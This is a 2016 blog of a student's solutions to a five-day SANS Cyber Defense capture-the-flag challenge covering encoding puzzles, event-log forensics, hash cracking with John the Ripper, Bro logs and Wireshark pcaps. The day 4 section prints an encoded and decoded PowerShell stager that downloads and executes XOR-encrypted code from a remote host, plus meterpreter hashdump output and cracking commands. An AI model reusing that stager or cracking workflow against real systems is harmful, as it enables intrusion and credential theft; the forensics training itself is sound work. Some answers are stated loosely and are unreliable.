Friday, October 28, 2016

SANS Cyber Defense Challenge: What did the other Powershell Command do?

I was wondering what the other powershell command did in day four.  Looks like a file.  It's probably just random bits, but  I was wondering if it was like that shift cipher.  Sometimes they hide Easter Eggs in the challenges.  So far I haven't found anything.  I'll have to look at that powershell command in the evtx log again.  I know that it was base64 encoded, so I decoded it.  Wonder if the command did anything else?

SANS Cyber Defense Challenge-Day 5 Solution

These weren't so bad.  The only one that I missed was the last one, and that was only because I was over-thinking it.  I was shifting it around in the browser and text editor, but I didn't realize that that is what I was supposed to do.  I thought that maybe I had to decode it.  This was the steganography one-a meaning hidden in just the way that the numbers were aligned.  A shift-cipher.  Disappointed in myself.  I tried.  I was the only SEC 401 Student that I know of that was in the top 10, so that's something.  I won a Raspberry Pi CanaKit.  The top ten got prizes.

What's the secret word for SANS San Diego 2016 day 5?
bluescreenoflife

The first challenge - (5 its)
Simple base64 encoding.  Just decode it.  You see enough of them, and you know what to do.

The first challenge is: VGhlIGFuc3dlciB0byB0aGUgZmlyc3QgY2hhbGxlbmdlIGlzOiBtYXRocw==
maths

What is the answer to the first challenge? The answer is a lower case string.

The second challenge - (20 pts)
The 2nd challenge is: V2toIGRxdnpodSB3ciB3a2x2IGZrZG9vaHFqaCBsdjogdnhwcGR3bHJxIA==

So base64 decode again.  The it is a rot encoding.  You have figure out how many rotations.  There are online tools for this to crack them quickly.  Again, you see enough, your brain starts to recognize them.  The rotation was 23 for this one: summation

What is the answer to the second challenge? The answer is a lower case string.


61584235636e4a6c596e427a595849674f6e4e704947566e626d56736247
466f5979426b636d6c6f6443426c6148516762335167636d563363323568
4947566f56416f3d0a

What is the answer to the third challenge? The answer is a lower case string.

This one was fun.  First you hex decode it.  Then you get base64 string that you decode.  The answer is backwards.  ipyrrebpsar :si egnellahc driht eht ot rewsna ehT  It's raspberrypi.  :)

Spot the Pattern - (35 pts)
Download and inspect this file: https://sanschallenge.org/files/phrase.txt

What is the day 5 phrase that pays? The answer is a lower case string.

Only question that I didn't get.  We were told how it was solved, though.  You look at the file in your browser or text editor and resize the screen until the lines are lined up a certain way.  In the white space, you see a website.  Alternately, I saw Mr. Conrad do something the command line.  I didn't catch all of it, but it showed the website in # signs.  The phrase was blueteamforever.

SANS Cyber Defense Challenge-Day 4 Solution

These weren't too bad because as long as you downloaded them on a Mac or Linux, which downloads the actual file, and put them on a Windows 7+ VM, then all you had to do was double click the file in the Windows VM and the program that you needed was automatically loaded.  The only two where you couldn't find the answer in the event logs were the powershell questions where you had to study the security2.evtx.  You had to Base64 decode the Base64 encoded string in the Powershell command and it gave you the User-Agent.  You also had to use that same method to find the IP Address.  The others were straight forward if you were looking for them.

What's the secret word for SANS San Diego 2016 day 4?
watchersonthefirewall

Group add - (5 pts)
The following series of questions are based on these two Windows event logs:

https://sanschallenge.org/files/sanschallenge-security.evtx
https://sanschallenge.org/files/sanschallenge-system.evtx

They are the security and system event logs from a compromised Windows 7 system. Analyze these files on a Windows 7+ system.

Part of your challenge requires you to determine which event log to use to answer each question.

What is the Security ID of the user added to a security-enabled local group?

Answer with the complete security ID, for example: 

S-1-5-21-1234567890-1234567890-1234567890-1234
security.evtx
S-1-5-21-3463664321-2923530833-3546627382-1007

Name that password - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

What is rachel's password?
security.evtx
Suspicious service - (5 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 
There is a command in one of the logs 
net user rachel replicant2 /add
This is a command to add a user and a password to the SAM database.
replicant2

A suspicious service was created, with a 16-character service name. What is the name of the service? The answer is a 16 character string, with mixed case.

Suspicious pipe - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious pipe was created: what is the name of the pipe? Answer with the name itself, and omit any directories. For example, if the pipe is: \\.\pipe\name

...the answer would be "name" without the quotes.
This was found in another command.  cmd.exe /c echo uxjxtu > \\.\pipe\uxjxtu
uxjxtu

Name that VBS - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious VBScript is run from a temporary folder. What is the name of the .vbs script?

Include the .vbs script name only, preserve the case, and omit the directory. For example, if the path was:

C:\Windows\TEMP\ExAmPLe.vbs

...the answer would be 'ExAmPLe.vbs without the quotes.

Not rocket science.  The only one in the security.evtx that I could find that was run out of a temp directory.
WvkkaCoF.vbs

Name that EXE - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

A suspicious executable is run from a temporary folder. What is the name of the executable? Include the EXE name only, preserve the case, and omit the directory. For example, if the path was:

C:\Windows\Temp\asdfgh\ExAmPLe.exe

...the answer would be 'ExAmPLe.exe' without the quotes.

This was the only one in the security.evtx that I could find that was run out of a temp directory.  ZaCVvSRkGaIJZ.exe

Source Workstation - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx 

What is the name of the Source Workstation that created the event: "The computer attempted to validate the credentials for an account"? The answer is a mixed case string.

So yet again, this one was in the security.evtx.  ZgTtCUS6fFdExXeu

Compromised user - (5 pts)
The next series of questions are based on the following evtx file:

https://sanschallenge.org/files/sanschallenge2-security.evtx

Notice the "2" in the name, this is a different file than the one analyzed in the previous series of questions.

A PowerShell-based post exploitation framework is launched via "launcher.bat". What is the account name of the user that ran launcher.bat? The account name is a string, mixed case.

IEUser


If you base64 decode this, it gives the answer to the next two questions.  It was found in the powershell command in the 2-security.evtx.
JAB3AEMAPQBOAGUAVwAtAE8AYgBKAGUAYwBUACAAUwB5AHMAdABlAG0ALgBOAGUAVAAuAFcAZQBiAEMATABJAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUABSAG8AWABZACAAPQAgAFsAUwB5AHMAdABFAG0ALgBOAEUAVAAuAFcARQBCAFIARQBRAFUAZQBTAFQAXQA6ADoARABFAEYAQQB1AEwAVABXAGUAYgBQAFIAbwB4AFkAOwAkAFcAQwAuAFAAUgBvAHgAeQAuAEMAUgBFAGQAZQBuAHQAaQBBAGwAcwAgAD0AIABbAFMAWQBzAFQARQBNAC4ATgBlAFQALgBDAHIAZQBEAEUAbgBUAGkAYQBsAEMAYQBDAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AFcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEATABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAFIAWwBdAF0AJABiAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAFcAQwAuAEQATwBXAE4ATABPAGEAZABTAFQAUgBJAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABrAFsAJABpACsAKwAlACQASwAuAEwARQBuAEcAVABIAF0AfQA7AEkARQBYACAAKAAkAGIALQBqAE8ASQBuACcAJwApAA==

$wC=NeW-ObJecT System.NeT.WebCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEAdErs.ADd('User-Agent',$u);$wc.PRoXY = [SystEm.NET.WEBREQUeST]::DEFAuLTWebPRoxY;$WC.PRoxy.CREdentiAls = [SYsTEM.NeT.CreDEnTialCaChe]::DefaultNetWorKCREdenTIaLS;$K=')0dhCy1J9s3qY@%L!7pu]T|vV}tn[AQR';$i=0;[CHAR[]]$b=([cHaR[]]($WC.DOWNLOadSTRInG("http://192.168.198.149:8080/index.asp")))|%{$_-BXoR$k[$i++%$K.LEnGTH]};IEX ($b-jOIn'')
User-Agent - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx

The PowerShell-based post exploitation framework manually sets a user agent. What is the user agent?

IP address - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

What IP address is index.asp downloaded from? Respond with the IPv4 address is dotted quad format, for example "192.168.1.2" without the quotes.
192.168.198.149


Thursday, October 27, 2016

SANS Cyber Defense Challenge-Day 3 Solution

I used John The Ripper and Security Onion's tool bro to answer these questions.

Crack is Whack - (10 pts)
You are a newly-hired security engineer at KVWN (channel 4), San Diego. You are tasked with securing the enterprise, beginning with auditing existing password security.

Inspect the following:

---

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
btamland:1006:aad3b435b51404eeaad3b435b51404ee:1745892e12bc8aaab1b81a927600d67a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ckind:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
eharken:1007:aad3b435b51404eeaad3b435b51404ee:0e8b0d78cada2f22e733d1b6e6021da2:::
vcorningstone:1001:aad3b435b51404eeaad3b435b51404ee:af1d0a042ecee784095d368b7f831168:::
meterpreter > 

---

What is vcorningstone's password?

You copy/past vcorningstone's line into a text editor and save it as vcorningstone on a Linux machine with John the Ripper.  You add a format.  Then you simply let john do its job.
john ./vcorningstone --format=NT
sekrit

Crack me Up - (10 pts)
Inspect the following:

---

mysql> select user,password from mysql.user;
+------------------+-------------------------------------------+
| user | password |
+------------------+-------------------------------------------+
| root | *2CAB1C0BB01BDEE1CFB157535AE9E788C3A966D3 |
| debian-sys-maint | *992B89066D80745163BF9828B1CBE9F7F2ECD1AE |
| drupal7 | *2CAB1C0BB01BDEE1CFB157535AE9E788C3A966D3 |
| ronburgundy | *599075AEF85B14C3CFAFCBCA3CEE1715AABD56DE |
+------------------+-------------------------------------------+
4 rows in set (0.00 sec)

---

What is ronburgundy's password?

This one is a little weird because you have to know how John The Ripper takes input.  You have to remove everything except for the MySQL 4.1+ SHA1 hash/hashes that you want.  That way John The Ripper can detect as mysql.  This one is anchorman.

john ./passwordlist3.txt --wordlist=wordlist.txt


You have answered this question correctly. Points earned: 10 
Your total score from this question is: 10
Jimmy Crack Corn - (15 pts)
Inspect the following:

---

ckind:$6$/lDBMLNZ$pdajNb.NySSswRSmDE2FXw2WCYFnjjAcNI7sCbZ/8Tyx00lPpGUp4egCsHXqDX11Yunn5KYTzYmpnFQFNj5Wd0:17091:0:99999:7:::
btamland:$6$WsSuXR2A$GQ1kj1F4hV7FACaUEjLxNorYrTily1LOqOl6MgaJzVIMRLVkKrdMLyAjzRSk/LGEyGbIt8DN0nhuN56UOLRfq/:17091:0:99999:7:::
vcorningstone:$6$Q3NQpOeX$4GJa7DyFOsaq4WxrM/2urOHHm4fgMqeVrr1ieVM2p6SVGKmZmMxVbRMMWEq2.ut4dx71XRArYNagsky4AfK43/:17091:0:99999:7:::
eharken:$6$Q0bL6Gy3$/RLMMwsj5vlOxyI2OnVd1IOsP6nFKROonJbUw4TOdvw5OLC94C1vWMqLQ2d0wDUXYsP603Pi4V7vOTp658tEg1:17091:0:99999:7:::

---

A colleague has run CeWL (Custom Word List generator) against the KVWN website, providing this custom wordlist: https://sanschallenge.org/files/sd2016-wordlist.txt

What is btamland's password?
This one is a SHA 512 hash.  You're given a word list.  So you have to use it to crack this one.  You can tell because the $6$ tells what kind of hash it is.
john ./passwordlist2.txt --wordlist=wordlist.lst --rules
The --rules add mangling rules.  Read the John The Ripper documentation for more information.
heinie!

You have answered this question correctly. Points earned: 15 
Your total score from this question is: 15
Bro - (10 pts)
The next series of questions are based on Bro logs. 

Download https://sanschallenge.org/files/bro.zip and uncompress it.

The 'bro-cut' command will be quite handy.

Bro may be installed on a Debian-style Linux system (including Kali) by typing:

$ sudo apt-get install bro-aux

These questions may be answered without Bro, by simply analyzing with Unix/Linux text-based tools such as grep, sed, etc. Bro will make the challenges easier, for example:

$ cat dns.log | bro-cut query 

More information on Bro is available at: https://www.bro.org/

----

Inspect dns.log


What is the most common DNS name successfully resolved via UDP port 53? Respond with the full name, for example: 'www.google.com' without the quotes.

With DNS, it is usually UDP 53, so you didn't have to add the protocol to this query.  So if you look at the logs, They have headers at the top that help bro find what you want.  So, you just cat the log-which prints it to the screen, then ask bro to cut out the headers and information that you want, then you sort it, grab the unique queries and count them, then you sort according to the number of occurrences-recursively-which means backwards.  Then you grab the first 10 entries in the file.  Now, I didn't take out the non valid entries.  I just looked at the first 10 entries for the most dns queries with an rcode of 0, which means that it successfully resolved.  My query was something like this:

cat dns_log | bro_cut query, rcode | sort | uniq -c | sort -r -n > file
cat file | head -n 10

proxim.ircgalaxy.pl

Longest DNS Query - (5 pts)
How long is the longest DNS query in dns.log? 

For example, this DNS query is 17 bytes long:

sanschallenge.org
cat dns.log | bro-cut query, | awk '{ print length; }' > file
sort -n file > file2

Then I just picked the one with the longest query.


Longest User Agent - (10 pts)
How long is the longest user agent in http.log? 

You don't have to know the name.  You just need how long it is.  So, I did something like this:

cat http.log | bro-cut user_agent | sort | uniq -c | awk { ‘print length;‘} | sort -n


Shortest user_agent - (10 pts)

What is the shortest non-blank user_agent in http.log? Ignore blank user agents (such as '-').

Hint: it is comprised of capital letters only. For example: 'FOO' without the quotes.

There is probably a lot better way to do this.  I did this:
cat http.log | bro-cut user_agent | sort | uniq -c | sort -r -n | awk {'print $2'} | sort -r -n > file
cat tail -n 20

IE

Longest duration - (15 pts)

What socket pair has the longest duration in conn.log?

Answer in the following format: srcip[colon]srcport[space]dstip[colon]dstport

For example, if the source IP 10.10.10.10 from port 12345 sent traffic to 8.8.8.8 on port 80, your answer (without the quotes) would be: '10.10.10.10:1234 8.8.8.8:80’

cat conn.log | bro-cut duration id.orig_h id.orig_p id.resp_h id.resp_p | sort -n > file2
cat file2 | tail -n 10
The longest one was at the bottom.  168.131.48.242:1076 143.215.15.145:80

Inspect conn.log

How many TCP sessions had a duration longer than 24 hours?

The time was expressed in seconds and milliseconds, so I divided each time by 60, then divided each time by 60 again to get how many days that the connections were active.  If it was greater than 24, I printed it.

9


SANS Cyber Defense Challenge-Day 2 Solution

What’s the secret word for SANS San Diego 2016 day 2?


cryptololcat

If you use Wireshark in most of these, you will find the answer that you need.
mystery.pcap
What type of request does 192.168.11.62 send to 192.168.11.1 in the first DNS Request?
The answer was in the question.

DNS Request

What is the DNS Transaction ID in hexadecimal in the DNS query?
You put a filter in Wireshark called dns.id == 0x2870.
0x2870

From your knowledge of DNS, how many responses should there be to a DNS query?
General knowledge question here and hint for the question What is this type of attack called?.
1

What is the number of the frame where the transaction ID in the response matches that first request?

If you look at pcaps in Wireshark, it tries to tell you which frame response matches with which query-they aren't always right next to each other in the pcap because of other traffic.  Look at the first packet's transaction id.  Then filter according to it.
Wireshark Filter:  dns.id == 0x2870
102

What is the IP address sent in the spoofed DNS A record responses?
This was all over the pcap.  There was only one IP Address that was not 10.10.10.10: 108.61.4.52.  (You use the filter dns.a != 0a:0a:0a:0a.  0a is 10 in hex.  != means not =.  So you find the valid response that way.)  10.10.10.10 was not the true response.  The computer accepts whichever answer it gets first.

10.10.10.10

What is this type of attack called?

DNS Cache Poisoning

Which frame triggered the ICMP Type 3 Code 3 packet?
You look at packet 104,  frame.number = 104, then you look at its transaction id which is 0x0065, then you filter by the transaction id.
dns.id == 0x0065
The transaction ID in 103 matched the ICMP Type 3 Code 3 packet in 104.  It will not always be the packet near it.

portscan.pcap

What TCP port is *not* open on 192.168.198.190?

port 137-the only one with no traffic  Sometimes resets signal closed/filtered ports, but every answer had traffic other than resets, so the only one that was *closed* was port 137.  In Wireshark, If you filter by port like tcp.port == 137, you don't see any traffic.  If you do the same with udp.port == 137, you will still see not traffic.  You can do that with every answer by just changing the port number and seeing that the others had traffic.

What OS is running on 192.168.188.190?

I found this in the SMB traffic for the Session Setup and Andx Response.  Wireshark>Statistics>Protocol Hierarchy>SMB Session Service>Right Click and click "Apply As Filter"  Click on a Session Setup and Andx packet, and Right Click and click Follow TCP Stream
Windows 7 Enterprise 7601

What is the day 2 phrase that pays?

In Wireshark, go to file>export>objects>http, you will see that there is a pdf called "day2.pcap".  The phrase that pays was in the pdf file.

bustapcap


What version of squid was used for http proxy?

The filter that I used for this one in Wireshark is:  icmp contains squid.  Or you could use icmp contains 73:71:75:69:64

3.5.19

What is the ICMP tunnel phrase?
So the filter I used for this one is:  icmp contains 74:75:6e:6e:65:6c
That is the hex for tunnel.

In the pcap traffic, you will notice that the sanschallenge.org website has a special domain, test.sanschallenge.org.  You will also see a file called tunnel.html.  So, if you navigate to test.sanschallenge.org/tunnel.html, a page will load that says, “tunnelsallthewaydown”.

SANS Cyber Defense Challenge-Day 1 Solution

Secret word 1 - (5 pts)
What's the secret word for SANS San Diego 2016 day 1?

This word was given to us.
advancedpersistenttaco

Use Google to answer most of these.  It didn't say in the challenge that you couldn't use outside resources.

How many ports
How many ports are available on a Linux or Windows operating system, counting both TCP and UDP?

I learned this question in the Networking portion of SANS SEC 401.  Some may be saying, "There's 65,536 ports.  Why is the answer 131,072?  Well, because they said both TCP and UDP.  Add 65,536 and 65,536, and you get 131,072.

0
131070
65536
About 7
1337
131072
65535

Name that OS
This is a legitimate user agent string sent from a Microsoft Windows client operating system:

Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

What OS is the client running?

Windows 8.1
Microsoft Bob
Atari TOS
Windows Vista
Windows 8
Windows XP
Windows 10
Windows 7

sans.org
When was the domain sans.org registered?

1995-08-04
1967-11-13
1337-12-25
1994-09-12
1997-03-12
1776-07-04
1990-01-01
2016-10-27

Time to Live
What is the name of the IPv6 field that is equivalent to IPv4's Time to Live?

I learned this one in SANS SEC 401 this week during the Networking portion.

Hop Limit
Version
Next Header
Flow Label
Traffic Class
Time to Live

IPv6
A new network engineer announces that he's going to conduct an active scan and ping every address on a standard IPv6 /64 subnet. You mention the vast size of the subnet, and the engineer confidently states he can ping a million addresses/day.

How long will the ping scan take, assuming 1 million hosts are scanned per day?  

So, there are about 18446744073709551616 hosts per ipv6/64 network.  If you divide that by 1,000,000, it gives you the daily rate in which you could scan the hosts.  Then you divide by 365 to give you the years..
42
5+ years
50,539,024+ years
50+ years
50,539+ years
Infinity!
1337 minutes
A month or so
50,539,024,859+ years  

What is the IPv6 address of sanschallenge.org?

If you watch the traffic by having tcpdump or wireshark running, and you ping https://sanschallenge.org, with a Mac or Linux, you should get an IPv6 address back.  Ping uses ICMP traffic.

ping sanschallenge.org

104.131.191.1
2604:a880:0:1010::5db:4001
2604:a880:800:10::1a64:2001
2001:470:1f06:bef::2
dead:beef:c0de:fa11:feed:babe:cafe:f00d
2400:cb00:2049:1::adf5:3a33
42

Version detection - (10 pts)
What version of Apache is running on https://sanschallenge.org? Answer with a number.

For example, if the version is "Apache/1.2.3", you would answer '1.2.3' without the quotes.

From a Mac or Linux terminal, you can use curl to make a HEAD request to request the headers from a website, assuming it's allowed.


Flag: - Convert to SHA1 Apache 2.4.7

Domo Arigato - (10 pts)
What directory is disallowed from spidering, per the robots.txt file on https://sanschallenge.org? Answer with the directory name only, including the leading and trailing slash. For example, if the entry is: 

Disallow: /folder/

The answer would be '/folder/' without the quotes.

You just navigate to https://sanschallenge.org/robots.txt, and it shows the /wickedsecret/ directory.

Flag: - Convert to SHA1 /wickedsecret/
Key size - (10 pts)
What is the size of the RSA public key used in the x509 certificate for https://sanschallenge.org?

Another you know it or you don't question.  RSA public keys are 2048 bits in length.

3072 bits
8 bits
1 bit
2 bits
16 bits
4 bits
1024 bits
64 bits
4096 bits
2048 bits
128 bits
32 bits
256 bits
512 bits